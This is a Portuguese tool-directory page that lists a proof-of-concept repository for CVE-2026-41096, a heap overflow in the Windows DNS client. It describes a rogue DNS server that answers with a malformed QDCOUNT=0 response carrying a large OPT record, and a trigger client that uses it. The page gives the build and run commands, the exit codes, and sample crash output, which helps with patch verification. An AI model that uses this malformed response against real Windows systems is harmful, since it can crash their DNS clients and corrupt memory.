Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41096 — Prova de conceito de exploit para CVE-2026-41096: estouro de heap no DnsRawTruncateMessageForUdp() do Cliente DNS do Windows. Inclui servidor DNS malicioso e cliente de acionamento para confirmar a vulnerabilidade. | Kitploit
Ferramentas/GitHubGitHub/m0n1x90/cve-2026-41096
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoFuzzingAnálise de DNSExploração de Binários
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

Prova de conceito de exploit para CVE-2026-41096: estouro de heap no DnsRawTruncateMessageForUdp() do Cliente DNS do Windows. Inclui servidor DNS malicioso e cliente de acionamento para confirmar a vulnerabilidade.

Ver Repositório
323há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41096 - PoC de Crash

Estouro de heap em DnsRawTruncateMessageForUdp() (dnsapi.dll). Uma resposta DNS manipulada com QDCOUNT=0 e um registro OPT grande causa um estouro de heap de 604 bytes quando a lógica de truncamento calcula incorretamente o ponteiro de destino.

Aviso MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

Componentes

ArquivoDescrição
rogue_dns_server.pyServidor DNS malicioso (Python 3). Responde a cada consulta com uma resposta QDCOUNT=0 + OPT (623 bytes).
trigger_client.cCliente de disparo (C/Win32). Chama DnsQueryRaw apontando para o servidor malicioso. Captura o crash via SetUnhandledExceptionFilter.

Requisitos

Atacante (servidor malicioso):

  • Python 3
  • Root/admin (porta 53)

Vítima (cliente de disparo):

  • SO Windows com serviço DnsCache (precisa de DnsQueryRaw)
  • Versão vulnerável de dnsapi.dll
  • Visual Studio / Windows SDK (para compilar)

Uso

1. Inicie o servidor malicioso:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. Compile e execute o cliente de disparo:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (Opcional) Ative o Page Heap para um crash determinístico:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

Códigos de Saída

CódigoSignificado
0Sistema está corrigido (DNS_ERROR_BAD_PACKET retornado corretamente)
1Erro (DnsQueryRaw não encontrado, problema de rede, etc.)
2Crash detectado (estouro de heap confirmado)

Exemplo de Saída

Vulnerável (Page Heap):

root@kitploit:~
[*] Consultando servidor malicioso 192.168.56.1:53 via DnsQueryRaw...
[*] Aguardando resposta...

[!!] CRASH - Exceção 0xC0000005 em 0x00007FFD1A2B4F20
[!!] ESCRITA em 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMADO - estouro de heap acionado.

Vulnerável (sem Page Heap):

root@kitploit:~
[*] Consultando servidor malicioso 192.168.56.1:53 via DnsQueryRaw...
[*] Aguardando resposta...

[!!] CRASH - Exceção 0xC0000374 em 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMADO - estouro de heap acionado.

Corrigido:

root@kitploit:~
[*] Consultando servidor malicioso 192.168.56.1:53 via DnsQueryRaw...
[*] Aguardando resposta...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - sistema está CORRIGIDO.
Baixar ferramenta